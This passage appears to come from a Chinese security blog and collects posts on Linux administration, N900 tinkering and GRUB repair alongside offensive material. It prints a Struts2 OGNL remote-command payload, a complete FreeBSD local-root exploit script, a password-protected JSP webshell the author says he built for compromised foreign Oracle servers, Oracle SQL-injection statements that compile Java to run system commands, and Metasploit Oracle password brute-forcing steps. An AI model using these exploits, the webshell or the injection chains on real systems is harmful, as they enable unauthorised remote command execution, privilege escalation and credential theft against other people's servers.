  ACTIVE            '/dev/VolGroup00/LogVol01' [3.94 GB] inherit

已经看到新改名的卷组是inactive了，2个分区LogVol00和LogVol01，用vgchange加载我们该名过的aaalvm卷组：

[root@locallhost ~]# vgchange -ay /dev/aaalvm
  2 logical volume(s) in volume group "aaalvm" now active

提示active状态成功，最后mount文件系统：

[root@locallhost ~]# ls /dev/aaalvm/
LogVol00  LogVol01
[root@locallhost ~]# mount /dev/aaalvm/LogVol00 /aaaa/
[root@locallhost ~]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
                       69G  2.7G   63G   5% /
/dev/hda1              99M   12M   82M  13% /boot
tmpfs                1010M     0 1010M   0% /dev/shm
/dev/mapper/aaalvm-LogVol00
                      222G  111G  100G  53% /aaaa
[root@locallhost ~]# mount /dev/aaalvm/LogVol01 /bbb/
/dev/aaalvm/LogVol01 looks like swapspace - not mounted
mount: you must specify the filesystem type

LogVol01是swap分区，不用挂载。把/bin/mount /dev/aaalvm/LogVol00 /aaaa/写入rc.local里面，让每次开机自动挂载，也可以写到fstab里面，但是如果写错出问题可能导致进不了系统，所以建议写rc.local。

java导出MS sqlserver的某表数据

遇到一Linux系统的Jboss的java环境连MS sqlserver的数据库，想要导出某表数据存为csv文件，用java实现如下：

import java.io.BufferedOutputStream;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.io.PrintStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

//by:vitter@safechina.net
//blog.vfocus.net

public class SqlServerDataDump {

        public static void  main(String[] arg){
           SqlServerDataDump sqlDump = new SqlServerDataDump();

           sqlDump.dataDump();          
        }

    public void dataDump() {
        final String databaseName = "dbname";
        final String userName = "sa";
        final String passWord = "passwd";
        final String serverHost = "192.168.1.10";
        final int serverPort = 1433;

        final String fileName = "/home/test/test.csv";

        // Create a variable for the connection string.
        final String connectionUrl = "jdbc:sqlserver://" + serverHost + ":"
                + serverPort + ";database=" + databaseName + ";user="
                + userName + ";password=" + passWord+";selectMethod=cursor";

        // Declare the JDBC objects.
        Connection con = null;
        Statement stmt = null;
        ResultSet rs = null;

        final String querySql = "select * from user";

        File outputFile = new File(fileName);

        PrintStream printStream = null;

//        if (!outputFile.isFile() || !outputFile.canWrite()) {
//            // is dir or readonly
//            return;
//        }

        try {

            printStream = new PrintStream(outputFile);

            Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
            con = DriverManager.getConnection(connectionUrl);
                        System.out.println("get connection success.");
            stmt = con.createStatement();
            rs = stmt.executeQuery(querySql);
                        System.out.println("dump data begin.");

            while (rs.next()) {
                String col1 = rs.getString(1);
                String col2 = rs.getString(2);
                String col3 = rs.getString(3);
                String col4 = rs.getString(4);
                String col5 = rs.getString(5);
                String col6 = rs.getString(6);
                String col7 = rs.getString(7);
                String col8 = rs.getString(8);
                String col9 = rs.getString(9);
                String col10 = rs.getString(10);
                String col11 = rs.getString(11);
                String col12 = rs.getString(12);
                String col13 = rs.getString(13);
                String col14 = rs.getString(14);
                String col15 = rs.getString(15);
                String col16 = rs.getString(16);
                String col17 = rs.getString(17);
                String col18 = rs.getString(18);
                String col19 = rs.getString(19);
                String col20 = rs.getString(20);
                …………………………………..

                printStream.println(col1 + "," + col2 + "," + col3 + "," + col4 + "," + col5 + "," + col6 + "," + col7 + "," + col8 + "," + col9 + "," + col10 + "," + col11 + "," + col12 + "," + col13 + "," + col14 + "," + col15 + "," + col16 + "," + col17 + "," + col18 + "," + col19 + "," + col20 + "," + ………..);
            }

                        System.out.println("end dump data.");

        } catch (Exception e) {
                     e.printStackTrace();

        } finally {
            if (null != rs) {
                try {
                    rs.close();
                } catch (SQLException e) {
                    e.printStackTrace();
                }
            }

            if (null != stmt) {
                try {
                    stmt.close();
                } catch (SQLException e) {
                    e.printStackTrace();
                }
            }

            if (null != con) {
                try {
                    if (!con.isClosed()) {
                        con.close();
                    }
                } catch (SQLException e) {
                    e.printStackTrace();
                }
            }

            if (null != printStream) {
                try {
                    printStream.close();
                } catch (Exception e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                }
            }
        }
    }

}

注意：classpath加.如果遇到找不到驱动，把sqljdbc.jar拷到当前目录；如果内存不够加-Xms512m -Xmx978m。

javac SqlServerDataDump.java -cp .:/usr/java/jdk1.6.0_20/lib/dt.jar:/usr/java/jdk1.6.0_20/lib/tools.jar./sqljdbc.jar

java -Xms512m -Xmx978m  -cp .:/usr/java/jdk1.6.0_20/lib/dt.jar:/usr/java/jdk1.6.0_20/lib/tools.jar./sqljdbc.jar SqlServerDataDump

干掉多出来的scvhost.exe进程

昨晚为了用下支付宝，装了支付宝安全控件，今天早上发现机器启动多了好些个scvhost.exe的进程，挨个查了下都是正常的系统服务，但是为啥多了呢？服务也没多启动，卸载支付宝也不管用，找另外机器用tasklist /svc对比了下，发现多的那几个scvhost的服务在别的机器上是共享在一个进程里面的。

而我的wuauserv wscsvc SharedAccess都是独立的进程。

在

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost

项下面发现

分的这几个组也没问题，这三个服务是在netsvcs这个组里面。

用sc query查发现

正常的是共享模式的：TYPE               : 20  WIN32_SHARE_PROCESS

而我的是10独立进程的，注册表里从

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

里面找到这三个服务把TYPE改成20

重启ok。由于利用scvhost后门比较多，建议能共享的都共享，这样进程里面scvhost进程就会少很多，比较容易发现问题。

明天就放假了，先回lp家，返京的时候再回下我家。年终奖和一月工资明天发，开始准备红包啦。

CVE-2010-4170也很给力啊

RedHat已更新：

https://rhn.redhat.com/errata/RHSA-2010-0894.html

在N900 X Terminal上加特殊字符快捷键

gconftool-2 -s /apps/osso/xterm/key_labels -t list --list-type=string "[Tab,Esc,PgUp,PgDn,~,^,|,<,>]"
gconftool-2 -s /apps/osso/xterm/keys -t list --list-type=string "[Tab,Escape,Page_Up,Page_Down,asciitilde,asciicircum,bar,less,greater]"

List of keysyms:http://wiki.linuxquestions.org/wiki/List_of_keysyms

CVE-2010-3847

很好很强大

http://marc.info/?l=full-disclosure&m=128739684614072&w=2

8一8最近的Kernet x86_64的32位支持的2个漏洞

CVE-2010-3081和3301这2个都是X86_64的Kernel在32位支持上的漏洞，据说07年的时候就出现过问题，后来补丁了，但是不知为何08年更新的时候把这个补丁又丢了。类似的问题好像不止在Kernel上出现过，一些其他应用，比如很常见的java的框架应用等等也都出现过，看来如此简单问题应该是管理上的问题，不是技术上的问题。对于开发人员来说这种情况应该要重视，以后可以考虑拿这些作为反面例子做培训。

3301的EXP在：http://www.exploit-db.com/exploits/15023/ 这也是之前补过后来又出现的bug，在常见的发行版上经测试此漏洞在Red Hat企业版序列上，似乎不受影响，但是在同一厂家的FC个人版上13最新update后依然受到影响。

而3081：http://www.exploit-db.com/exploits/15024/ 这个是新bug利用方式，在Red Hat系列企业版上受影响，杀伤力强大，但FC13不受影响。

目前Kernel还没补丁，临时关闭32位ELF支持可解决问题。

桌面上的IE被XXOO了

平时基本都不用IE的，估计是用Firefox的IEtab浏览过什么，导致双机桌面上的Internet Explorer打开主页是http://www.cnweb123.cn/?hao123。看了下IE属性设置的主页还是我默认的，而且发现用快捷方式和直接用iexplore.exe程序打开都是正常的，就用桌面的那个IE图标打开异常，一生气我就直接把桌面的IE图标给删掉了。

后来查了下注册表，发现[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]默认项被改成了"C:\Program Files\Internet Explorer\iexplore.exe" http://www.cnweb123.cn/?hao123，改回默认的"C:\Program Files\Internet Explorer\iexplore.exe" 就ok了。

另外恢复删除了的桌面上IE图标可以用下面几个方法：
1、打开“我的电脑”向上回到上一层“桌面”，把其中的Internet Explorer复制到桌面恢复。
2、或者在其他地方，只要不是桌面就行，创建一个Internet Explorer.{871C5380-42A0-1069-A2EA-08002B30309D}文件夹，然后把这个文件夹复制到桌面也可。
3、还有一种方法恢复，打开自定义桌面后，因为在SP3后就没IE的选项了，但是我们可以按i键然后确定，再确定就能恢复出来。
4、另外改注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons \NewStartPanel]的{871C5380-42A0-1069-A2EA-08002B30309D}项为0也能恢复。

Struts2/XWork漏洞

这个漏洞出来有段时间了，一直忙没去看，当时出来的时候就有人测试说威力挺大，昨天看了下，确实是远程执行命令，很多tomcat都是root跑的，那用这个，等于直接就root权限远程执行命令了。

昨天有服务器有问题，都让他们排查了下。基本上没有裸跑tomcat的，限制可以在系统级做，nginx和haproxy都对含\u0023的参数提交禁掉就ok了。单独跑tomcat的可以写个过滤器，每个项目都加上：

<interceptor-ref name="params">  
<param name="excludeParams">.*\\u0023.*</param>  
</interceptor-ref> 

比较麻烦。

官方已出补丁：

http://svn.apache.org/viewvc?view=revision&revision=956389

详情：http://vfocus.net/art/20100729/7509.html

exp：

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("touch /tmp/vittertestok")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Android 2.2装到的N900上

Android 2.2装到了SD卡上双系统，等MeeGo有电话模块和UI界面了后也装SD卡上，弄个多系统引导。

Android 2.2 for N900目前支持：

Dual boot with Maemo 5
Sound (built-in speakers only)
Touchscreen input
Keyboard input
WiFi networking (beta)
Internal eMMC as SD with automount
Partial battery monitoring
Microphone (alpha)
LCD && keyboard backlight (beta)
Charging (beta, only with wall-charger)
Accelerometers (alpha)
Bluetooth

还不支持：

Phone
Vibrator
Proximity && light sensors
Unlock/Lock switch on the right side
2D gfx
3D gfx
GPS
FM Radio Transmitter
FM Radio Reciever
Camera, camera button

安装：会重新分区SD卡，格式化，我的fat分了2G，其他的都分了EXT3装系统用。

umount /dev/mmcblk1p1
sfdisk -uM /dev/mmcblk1 << EOF
,2048,C
,,L
,,
,,
EOF
umount /dev/mmcblk1p1
mkdosfs /dev/mmcblk1p1
sfdisk -R /dev/mmcblk1
mke2fs -j -m0 /dev/mmcblk1p2
apt-get -y install bzip2 wget
cd /home/user/MyDocs/
wget http://downloads.nitdroid.com/Jay-c/multiboot-0.1.1.tar.gz
cd /
tar xzvf /home/user/MyDocs/multiboot-0.1.1.tar.gz
mkdir /and
mount -o noatime,rw /dev/mmcblk1p2 /and
cd /home/user/MyDocs
wget http://downloads.nitdroid.com/NITDroid-N900-0.0.5-3-BIG.tbz2
cd /and
rm -rf *
bzip2 -d /home/user/MyDocs/NITDroid-N900-0.0.5-3-BIG.tbz2
tar xvf /home/user/MyDocs/NITDroid-N900-0.0.5-3-BIG -C /and

找到自己的蓝牙MAC地址记下来，然后

cd /and/system/bin
vi load_modules.sh

找到BDADDR="0cddef0a0e6d" 把后面的地址改成你自己的。

cd /
umount /and
rmdir /and

安装完成，重启，出现多引导菜单。

进去系统发现比较慢，可能对硬件支持还不是太好吧。期待更新能支持电话和GPS模块。继续等MeeGo的系统。已经出的Day1有了UI，据说很快就出电话模块了。还有NeoPwn2啥时候能提供下载呢。

解决了N900的播放器和图片里面没内容问题

其实跟软件没什么冲突，就是cache的问题，在普通用户（user）的xterm终端下（注意不要用root用户）执行下面命令会重建cache的tracker数据库：

$ tracker-processes -r

这个命令会删除/home/user/.cache/tracker下的几个数据库文件重建，执行完重启下系统，再进媒体播放器和图片查看器就都出来了。

顺便把Metasploit装上了。具体安装步骤参考官方网站说明：http://metasploit.com/redmine/projects/framework/wiki/Install_N900

How to install GCC on the Nokia N900

I finally got around to installing GCC on my Nokia N900 today (using Maemo 5). I found it more challenging than I expected so I figured it would be nice to share how I did it.
First, you'll need root on the device. If it's not installed it already, see the instructions for installing and using rootsh.

Next, download the packages required for GCC. These can be found with a bit of searching on the Maemo repositories page. The fremantle and maemo5.0 repositories seem to be the same. For gcc you'll need these packages:

• binutils_2.18.50.200(IANA CZ88.NET)70820-4+0m5_armel.deb
• libgcc1_4.2.1-4maemo9+0m5_armel.deb
• libgomp1_4.2.1-4maemo9+0m5_armel.deb
• cpp-4.2_4.2.1-4maemo9+0m5_armel.deb
• gcc-4.2-base_4.2.1-4maemo9+0m5_armel.deb
• gcc-4.2_4.2.1-4maemo9+0m5_armel.deb

For g++, you'll also need these packages:

• linux-kernel-headers_2.6.28-20094803.3+0m5_armel.deb
• libc6-dev_2.5.1-1eglibc20+0m5_armel.deb
• libstdc++6_4.2.1-4maemo9+0m5_armel.deb
• libstdc++6-4.2-dev_4.2.1-4maemo9+0m5_armel.deb
• g++-4.2_4.2.1-4maemo9+0m5_armel.deb

I downloaded these packages onto my computer and copied them to my N900 via mass storage mode. If downloading them directly to your N900 is easier, you could do that.

Once you have all the packages, you can install them by logging in as root (sudo gainroot) and then running dpkg -i <package> for each package. You should be able to do this in the order listed above.

The last two g++ packages (libstdc++6-4.2-dev and g++-4.2) depend on themselves so the procedure isn't quite as easy (you can't dpkg -i one and then the other). First, unpack each of the packages by running dpkg --unpack <package>. Then run dpkg --configure -a. This will configure both packages at the same time. If they're not installed yet, you can run dpkg -i <package> for each of them.

At this point, you should have gcc and (optionally) g++ installed. To invoke them, run gcc-4.2 and g++-4.2. If you like, you can add your own symlinks to run them as just gcc and g++.

After installing GCC, I compiled some trivial C and C++ applications, which ran fine. You may need to install more libraries to compile more complicated applications. You should be able to find such libraries by browsing the fremantle repository.

I've tried adding http://repository.maemo.org/ as a repository in "App. manager", but it failed to find packages, which is why I installed them manually as described above. If you know of a way to make that method work, let me know; it would be much cleaner.

Also let me know If I missed any required packages or have the dependencies out of order.

I could have installed the Maemo SDK on my computer using these instructions, but I prefer to have my development environment right on the device so it is always available when I have my device. To use a nicer keyboard, I can SSH into my N900 from any computer with a full-sized keyboard (not just one with the Maemo SDK installed).

Now that GCC is installed, it's time to compile tangoGPS, my favorite GPS tracing tool, for Maemo 5. Hopefully I'll have some results to post soon.

今天安装BT4 final到移动硬盘上了

by:vitter
blog.vfocus.net

今天有人发过来BT4网站下载链接，看到出了BT4最终版了，立即下载回来研究下。我按官方说明的用unetbootin安装bt4-final.iso失败了，因为unetbootin没能识别到我的移动硬盘。

简单看了下BT4已经基于Ubuntu了，用的是grub引导的。于是想到可以用grub4dos去引导：

1、下载HP_USB_FW.rar，This tool can setup a booting USB flash disk。他可以创建dos的引导程序到U盘里面。下载后解压，执行HPUSBFW.EXE，选FAT32文件系统，快速格式化，要选中创建dos启动盘，路径指向解压目录下的HPUSBFW目录，这个目录下有引导程序COMMAND.COM、IO.SYS、MSDOS.SYS，这3个文件在格式化完成后被copy到移动硬盘跟目录下。

2、下载grub4dos，我们要提取里面的grldr、grub.exe文件复制到移动硬盘的根目录下。

3、用rar或者其他iso工具解压bt4-final.iso里面的boot、casper目录复制到移动硬盘的根目录下。

4、把boot\grub目录下的menu.lst文件复制到根目录下，同时编辑下，default 0改成default 4，这是修改默认启动选项为Start Persistent Live CD这项（可保存配置模式），这个能保证我们的系统可写。

5、在移动硬盘根目录下创建AUTOEXEC.BAT文件，内容如下：
@echo off
grub.exe

6、用PQ等分区工具把移动硬盘最后一部分空间留出2-3G，做成EXT3（移动硬盘）或EXT2（闪存）的文件格式，并把卷标命名为casper-rw，这个分区是为了保证我们选Start Persistent Live CD这项的时候能够存储数据的，当然你如果有足够大空间，越大越好。

OK，以上都完成后，重启机器，进入BIOS修改启动从U盘引导后重启。如果不出意外即可看到BT4的grub启动选项，默认应该是Start Persistent Live CD选项，进入系统。此时df可以看到我们的FAT32分区是加载到了cdrom。根目录加载的是我们的casper-rw卷，可读写，可保存配置。startx启动图形界面，可以享受BT4了。

之后我们可以进行汉化，因为采用了Ubuntu，安装软件都比较方便了。只要能上网，什么都可以采用apt-get的安装方式。

下面具体汉化和安装输入法：

汉化：
apt-get install language-pack-kde-zh language-pack-kde-zh-base language-pack-zh language-pack-zh-base
把微软雅黑msyh.ttf字体复制到/usr/share/fonts目录下创建的msfonts目录下然后：
cd msfonts
mkfontscale
mkfontdir
fc-cache
重启汉化完成。

输入法：安装小企鹅没问题，其他可能有各种问题。
apt-get install fcitx
在/etc/X11/Xsession.d/目录下新建一个文件99fcitx，内容如下：
export LANG="zh_CN.UTF-8"
export XIM_PROGRAM=fcitx
export XIM=fcitx
export XMODIFIERS="@im=fcitx"
fcitx&

具体汉化和输入法详见帖子：BT4 FINAL汉化+ 安装中文输入法。

年底FreeBSD发大奖了

Kingcope大牛曝了一个FreeBSD一个新的0day，官方尚未发布补丁。注意图中粉框中。

------------------FreeBSD 0day-----------------

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

RHEL5损坏的GRUB修复

一直说没去过新机房，这次够倒霉，一下就去了两趟。昨天晚上测试pipe的漏洞，发现上次升级过的内核居然没修复这个漏洞。一着急就没测试直接从2.6.18-128.7.1升级到2.6.18-164.6.1了，结果重启机器没起来。人倒霉的时候往往是一系列的意外，昨晚除了这个还测试其他的弄死了一台redhat9.0和一台RHEL3。本以为直接去机房也就是选一下旧内核就ok的事（升级前特意把grub.conf的timeout改成了10，平时都是0的）。什么都没带就直接奔机房去了，去了就傻眼了。发现机器启动直接死在GRUB上面了，屏幕只有GRUB四个字符而且没后面的>提示符，根本还没到选内核呢，没辙了只好回家先睡觉了，顺便下了一个5.4的ISO刻盘，准备今天顺便update下。过后回想应该是在RHEL5.2直接更新到5.4的update的最新内核后，更新了GRUB出问题了。可能跨越了一些系统版本的问题吧，我上次从5更新到5.2的时候似乎没update过GRUB。

今天过去先修复GRUB，结果也是不顺利，卡在USB光驱的驱动上，很郁闷。一直以为SCSI或者SATA驱动问题，后来发现2个硬盘数据全读出来了，忽然想到应该是USB驱动的问题，因为以前直接把光驱装在主板的IDE接口的，这次用的是USB的，选上USB驱动继续就ok了。下面是修复GRUB的步骤。

1、先将RHEL5.4盘放光驱中，改BOIS从USB光驱启动；
2、当引导到安装界面的时候，最后一行出现“boot：”时，输入“linux rescue”回车进入修复模式，加载完SCSI和SATA驱动后；
3、出现选择语言的对话框，默认选择English，回车；
4、下面出现选择键盘类型的对话框，选默认的“us”，回车；
5、我这由于少U盘驱动（就是卡在这郁闷了好久），出现选择驱动加载地址，选择Local CDROM，然后再选select driver 从列表里面找usb-storage的那个。加载完之后下一步；
6、下一个对话框是要你选择是否加载上网络接口，选“NO”回车；
7、接下来出现的对话框有“Continue“、”Read-only“、”Skip”三个选项，选默认的“Continue”，回车。这个是加载本地硬盘的系统，肯定不能选只读或者跳过，不然我们修复谁去；
8、最后一个OK对话框直接回车；
9、当出现“sh-3.2#”提示符时就进入修复模式了；
10、输入chroot /mnt/sysimage 回车chroot到硬盘系统；
11、用grub-install /dev/sda命令修复GRUB，出现如下图提示信息的时候说明GRUB已经修复完毕，重启系统即可。

修复ok后，重新顺便update到5.4，选择了更新GRUB的选项，装完重启发现有在GRUB上，不过这次是GRUB >提示符，进入到GRUB了，直接在里面输入
root hd(0,0)
setup (hd0)
这两个命令如下图：

安装完成，出现这个比较奇怪，应该是跨版本太多有些异常吧。直接ctrl+alt+del重启，进入系统一切正常。这次再从2.6.18-164内核（还是没补pipe那个漏洞）升级到新的2.6.18-164.6.1内核就没出现异常了。

又要年底了

刚从上海参加OWASP(China)2009 & ISF2009年会回来,这也是OWASP中国第1次年会，ISF第二次年会。OWASP一直致力于研究应用安全，比较出名的是每隔几年都会发布Top 10。这次的议题涉及方面也比较广，软的硬的， 取证，web，漏洞挖掘，恶意软件分析，安全构架等，有些收获。结合最近内部在做的一些项目和明年的一些规划，自己总结一下。

一、如何能做到由被动变为主动，安全一直处于一种被动方式，不管是防火墙也好，IDS、IPS也好其实大家现在都是一种被动防御的方式，那现在的云安全概念看似很美好，不过真的离完美还有好多路要走。结合明年我们的一些规划，不管是病毒平台也好，云安全也好，攻击和botnet监控也好，其实我们也在朝着被动变主动的方向在努力。

二、应用安全，SDL也许是个不错的选择，培训开发人员的安全意识加以辅助，希望明年能够引进一些人才，同时开发流程能参考SDL改进成自己特色的流程。

纵观现在的安全形势，道高一尺魔高一丈，我们还在路上，大家还需努力。

PS:OWASP(China)2009 & ISF2009年会PPT打包下载

Linux下安装Metasploit破解Oracle登录用户名密码

by:vitter@safechina.net
blog.securitycn.net

最近在搞oracle，一些小东西记录一下。

Metasploit是一个很好的攻击工具包，当然我们这次不是介绍这个工具包的，主要是大牛MC写了很多oracle的工具，在最近会经常用。我主要会用到经典工具tnscmd移植到MSF中的小工具（不如pl的好用，没换行，看结果很累），sid_brute和login_brute，用的最多的还是暴力破解oracle用户名和密码的login_brute。下面就说下怎么安装和使用，主要是安装，因为有些需要注意的东西，请注意斜体字。

1、先装gcc编译环境 （我用的server比较惨，最小安装，系统也老，FC2。）

rpm -ivh cpp-3.3.3-7.i386.rpm
rpm -ivh glibc-kernheaders-2.4-8.44.i386.rpm
rpm -ivh glibc-headers-2.3.3-27.i386.rpm
rpm -ivh glibc-devel-2.3.3-27.i386.rpm
rpm -ivh binutils-2.15.90.0.3-5.i386.rpm
rpm -ivh gcc-3.3.3-7.i386.rpm

2、安装oracle客户端

下载：http://www.oracle.com/technology/software/tech/oci/instantclient/htdocs/linuxsoft.html
rpm包安装比较省事,当然你也可以下载压缩包安装，按照说明来装即可。

rpm -ivh oracle-instantclient11.1-basic-11.1.0.7.0-1.i386.rpm oracle-instantclient11.1-devel-11.1.0.7.0-1.i386.rpm oracle- instantclient11.1-sqlplus-11.1.0.7.0-1.i386.rpm

装完后，执行下面2条命令，同时设置在环境变量里，加入到/etc/profile最后即可：

LD_LIBRARY_PATH=/usr/lib/oracle/11.1/client/lib/
export LD_LIBRARY_PATH

3、装ruby

下载：http://www.ruby-lang.org/en/downloads/

tar zxvf ruby-1.8.5-p231.tar.bz2   #（这个注意下，不要装1.9的版本，否则会出现MSF不能读CSV文件的问题,报NameError uninitialized constant CSV::Reader错误）
cd ruby-1.8.5-p231
./configure
make && make install

4、装ruby-oci8

安装说明：http://ruby-oci8.rubyforge.org/en/InstallForInstantClient.html
下载：http://rubyforge.org/projects/ruby-oci8/
这个ruby-oci8-1.0.6版本或者 ruby-oci8-2.0.0都可以。
安装前要确认环境变量，即sqlplus能正常运行就可：
LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export LD_LIBRARY_PATH

tar zxvf ruby-oci8-2.0.0.tar.gz
cd ruby-oci8-2.0.0
make
make install

5、装ruby-dbi

下载：http://rubyforge.org/frs/?group_id=234
用dbi-0.2.2，一定不要新过这个版本，否则MSF会报“The dbi module is not available!”错误。

cd dbi-0.2.2
ruby setup.rb config --with=dbi,dbd_oracle  #（--with=dbi,dbd_oracle这个参数一定要，否则还是报dbi错误）
ruby setup.rb setup
ruby setup.rb install

6、下载安装使用MSF

svn co http://metasploit.com/svn/framework3/trunk/ ./
./msfconsole

如果msf报错缺少openssl、zlib、gem，则需要先装下。

rpm -ivh openssl-devel-0.9.7a-35.i386.rpm
cd ruby-1.8.5-p231/ext/openssl
ruby extconf.rb
make
make install

装zlib

cd ruby-1.8.5-p231/ext/zlib
ruby extconf.rb
make
make install

装gem

tar zxvf rubygems-1.3.1.tgz
cd rubygems-1.3.1
ruby setup.rb all

一切ok就可以运行了（如果还缺别的按要求装上，用gem安装ruby模块很方便）：

msf > use auxiliary/admin/oracle/login_brute
msf auxiliary(login_brute) > set RHOST 192.168.0.11
RHOST => 192.168.0.11
msf auxiliary(login_brute) > set SID oracle
SID => oracle
msf auxiliary(login_brute) > info

    Name: Oracle brute forcer for known default accounts.
    Version: 6876
    License: Metasploit Framework License (BSD)

Provided by:
  MC <mc@metasploit.com>

Basic options:
  Name     Current Setting                                             Required  Description
  ----           ---------------                                                    --------  -----------
  CSVFILE  /root/msf3/data/wordlists/oracle_default_passwords.csv      no        The file that contains a list of default accounts.
  RHOST    192.168.0.11                                               yes       The Oracle host.
  RPORT    1521                                                              yes       The TNS port.
  SID            oracle                                                           yes       The sid to authenticate with.

Description:
  This module uses a list of well known authentication credentials for
  bruteforcing the TNS service. A log file of discoverd credentials
  can be found in ./data/wordlists/oracle_default_found.log.

References:
https://www.metasploit.com/users/mc
http://www.petefinnigan.com/default/oracle_default_passwords.csv
msf auxiliary(login_brute) > run

破解结果会存在MSF目录下data/wordlists/oracle_default_found.log文件里面。

改的一个非GBK的JSP的webshell

最近遇到些国外的oracle服务器，其中好多系统的内核无法local root，但是有在root权限下跑的java的web服务，有在web目录写权限，但是经常用的jshell是GBK的，在国外（先是棒子，放过了，后有小鬼子，再后来还有阿三，实在受不了了，自己改一个）的机器上基本不支持该字体，没办法自己改了一个cmd的webshell多加了一个密码认证。

------------------------------淫荡代码分割线------------------------------

<%@ page import="java.io.*" %>
<%
//by: vitter@safechina.net

     String PASS = "vitter";

    String cmd = request.getParameter("cmd");
    String pass = request.getParameter("pass");
    String output = "";

    if (pass != null && pass.trim().length() > 0) {
        if (pass.equals(PASS)) {
            output = "Success";
            request.getSession().setAttribute("loginUser", "loginOk");
        } else {
            output = "password ERR!";
            request.getSession().removeAttribute("loginUser");
        }
    } else if (cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((s = sI.readLine()) != null) {
                output += s;
            }
        }
        catch (IOException e) {
            e.printStackTrace();
        }
    }

    boolean ifLogin = false;
    Object loingUser = request.getSession().getAttribute("loginUser");
    if (loingUser != null) {
        ifLogin = true;
    }
%>
<FORM METHOD=POST ACTION='vittercmd.jsp'>
    <%
        if (!ifLogin) {
    %>
    Password:<INPUT name='pass' type=password>
    <%
    } else {
    %>
    CMD:<INPUT name='cmd' type=TEXT>
    <%
    }
    %>
    <INPUT type=submit value='Run'>
</FORM>
<hr>
<pre>
    <%=output %>
</pre>

附：oracle提权的小技巧

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(filename.startsWith("http")?new InputStreamReader(new URL(filename).openStream()):new FileReader(filename));
String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual ;

